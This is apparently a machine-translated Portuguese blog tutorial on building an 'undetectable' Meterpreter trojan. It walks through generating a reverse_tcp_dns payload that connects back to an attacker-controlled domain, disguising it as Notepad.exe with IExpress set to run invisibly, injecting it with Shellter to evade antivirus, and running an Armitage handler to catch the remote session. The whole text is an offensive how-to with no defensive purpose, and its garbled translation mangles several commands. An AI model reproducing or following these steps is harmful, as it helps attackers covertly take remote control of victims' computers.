NOTÍCIAS

[ANONYMOUS][grids]

Criar um Trojan Indetectável Usando um nome de domínio

Tempo de leitura: 1min

Leia também



Neste tutorial vou mostrar como criar um indetectável Meterpreter Trojan usando um nome de domínio. Tomei um guias alguns / tutoriais e construiu-a em um. A primeira parte está a criar o Payload DNS. A segunda parte é criar o arquivo executável. Parte 3 está usando tanto em Shellter para criar o seu Trojan indetectável. Parte 4 é a criação de seu ouvinte usando Armitage.

Coisas que você precisa:

  • Kali Linux
  • janelas
  • Uma conta Sem IP com um nome de domínio
  • Um porta encaminhada no seu roteador
  • Shellter

Parte 1: Criando o Payload DNS

Usando Kali:
  1. Abra Metasploit em Kali, digitando msfconsole em um terminal.
  2. Tipo de uso de carga útil / windows / meterpreter / reverse_tcp_dns .
  3. Tipo mostrar opções. Isto irá mostrar-lhe que você precisa para definir o seu lhost e lport.
  4. Digite lhost set (hostname que você criou, sem http: //).
  5. Tipo definir lport (porta que você tenha encaminhado no seu roteador configurado para a máquina de Kali).
  6. Tipo gerar -H . Isto irá mostrar-lhe as opções para gerar a carga útil. Você pode escolher diferentes opções, mas, pelo menos, fazer o seguinte.
  7. Digite gerar -f (nome do arquivo que você escolher para a carga útil) janelas -p -t cru . Ex. gerar janelas -p DNS -f -t crua
  8. Sair do terminal e clique em Arquivos. Sua carga útil será em sua Home (A menos que você definir uma opção para um local diferente).
  9. Transferir a carga útil criado para o Windows. (Esteja ciente de que o seu AV pode detectá-lo em seu estado atual).



Parte 2: Criando o arquivo executável no Windows

  1. Escolha a opção que se aplica a você. (Importante como Shellter não funciona com executáveis ​​de 64 bits).
  • 32 bits do Windows - Navegue até C: \ Windows \ System32 \ IExpress.exe (clique com o botão direito e selecione Executar como administrador)
  • 64 bits do Windows - Navegue até C: \ Windows \ SysWOW64 \ IExpress.exe (Botão direito do mouse e selecione Executar como administrador)
  1. Escolha Criar novo arquivo auto directiva Extração e clique em Avançar.
  2. Clique em Avançar na página Finalidade Package.
  3. Digite o título do pacote. (Isso pode ser o que quiser) Ex: Notepad.exe
  4. No Prompt, clique em seguinte.
  5. Não exibir uma licença. Clique ao lado.
  6. Clique em Adicionar e selecione qualquer arquivo no seu computador. Eu escolho Notepad.exe na pasta C: \ Windows \ System32. Clique em Avançar.
  7. Clique na seta suspensa e escolha o nome do arquivo que você escolher na última tela. Clique em Avançar.
  8. Escolha Invisível e clique em Avançar.
  9. Nenhuma mensagem. Clique em Avançar
  10. Clique em Procurar e digite um nome para o arquivo de malware e um destino.Verifique a Ocultar Extraindo Progress Animação de usuário Arquivo. Clique em Avançar.
  11. Selecione Não reiniciar e clique em Avançar.
  12. Você pode então escolher para salvar a diretiva de auto-extração ou não salvar.Clique em Avançar.
  13. Clique em Avançar novamente sobre a criação de pacotes. Em seguida, clique em Concluir.


Parte 3: Usando ambos criados arquivos no Shellter criar seu Trojan

  1. Abra a pasta que Shellter está. Clique direito sobre Shellter.exe e clique em Executar como Administrador.
  2. Tipo A para Auto.
  3. Digite N para Não
  4. Digite o local do arquivo EXE criado a partir Parte 2 e aperte enter. Vamos Shellter fazer é coisa de 30 segundos a um minuto.
  5. Quando solicitado a escolher de carga, tipo C para o costume.
  6. Digite o local de sua carga criado na Parte 1 e aperte enter.
  7. Digite N para Nenhum carregador DLL reflexiva.
  8. Hit entrar e deixar terminar Shellter fazendo é coisa Se ele diz Injection Verificado! você deve ter um Trojan indetectável trabalhando.
  9. Pressione Enter para sair Shellter.

Parte 4: Configurar seu ouvinte

Você pode usar Metasploit ou Armitage. Eu prefiro Armitage assim que meu tutorial será para isso.
  1. Volte para Kali.
  2. Abra o Terminal e digite Msfupdate
  3. Uma vez que é feito tipo apt-get install Armitage.
  4. Tipo de inicialização msfdb
  5. Abrir Armitage
  6. Clique em Conectar
  7. Clique em Sim
  8. Uma vez Armitage abre Tipo: uso explorar / multi / manipulador
  9. Tipo definir lhost 0.0.0.0
  10. Tipo set lport (a sua porta que transmitiu no seu roteador)
  11. Tipo janelas conjunto de carga útil / meterpreter / dns tcp reversa
  12. Tipo definir exitonsession falsa
  13. (Opcional.) Digite definir autorunscript migrar -f
  14. (Opcional.) Digite definir prependmigrate Verdadeiro
  15. Tipo de explorar -j
(Passos opcionais estão a migrar o processo automaticamente para que a sessão não termina antes de poder fazê-lo manualmente)
Agora você deve ser capaz de executar o seu Trojan indetectável e obter uma sessão Meterpreter.


Tags: